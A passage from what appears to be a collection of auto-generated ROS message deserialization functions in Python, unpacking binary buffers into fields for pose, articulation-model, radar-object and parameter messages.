str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parameters = str[start:end].decode('utf-8')\n else:\n self.parameters = str[start:end]\n start = end\n end += 4\n (self.max,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pairing.rapp = str[start:end].decode('utf-8')\n else:\n self.pairing.rapp = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.pairing.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.parameters = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.key = str[start:end].decode('utf-8')\n else:\n val1.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.pairing.parameters.append(val1)\n start = end\n end += 4\n (self.hash,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.role = str[start:end].decode('utf-8')\n else:\n self.role = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.result,) = _struct_B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.name = str[start:end].decode('utf-8')\n else:\n self.model.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v43 = val1.position\n _x = _v43\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v44 = val1.orientation\n _x = _v44\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v45 = val1.stamp\n _x = _v45\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v46 = val1.position\n _x = _v46\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v47 = val1.orientation\n _x = _v47\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v48 = val1.position\n _x = _v48\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v49 = val1.orientation\n _x = _v49\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.model.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.name = str[start:end].decode('utf-8')\n else:\n self.data.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v50 = val1.position\n _x = _v50\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v51 = val1.orientation\n _x = _v51\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v52 = val1.stamp\n _x = _v52\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v53 = val1.position\n _x = _v53\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v54 = val1.orientation\n _x = _v54\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v55 = val1.position\n _x = _v55\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v56 = val1.orientation\n _x = _v56\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.data.track.channels.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v99 = val1.position\n _x = _v99\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v100 = val1.orientation\n _x = _v100\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v101 = val1.stamp\n _x = _v101\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v102 = val1.position\n _x = _v102\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v103 = val1.orientation\n _x = _v103\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v104 = val1.position\n _x = _v104\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v105 = val1.orientation\n _x = _v105\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v106 = val1.position\n _x = _v106\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v107 = val1.orientation\n _x = _v107\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v108 = val1.stamp\n _x = _v108\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v109 = val1.position\n _x = _v109\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v110 = val1.orientation\n _x = _v110\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v111 = val1.position\n _x = _v111\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v112 = val1.orientation\n _x = _v112\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 24\n self.T = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 34\n (_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs,) = _struct_H6B5f2Bf.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tsp_turtles = str[start:end].decode('utf-8')\n else:\n self.tsp_turtles = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.conveyor_turtle = str[start:end].decode('utf-8')\n else:\n self.conveyor_turtle = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.catch_turtle = str[start:end].decode('utf-8')\n else:\n self.catch_turtle = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, 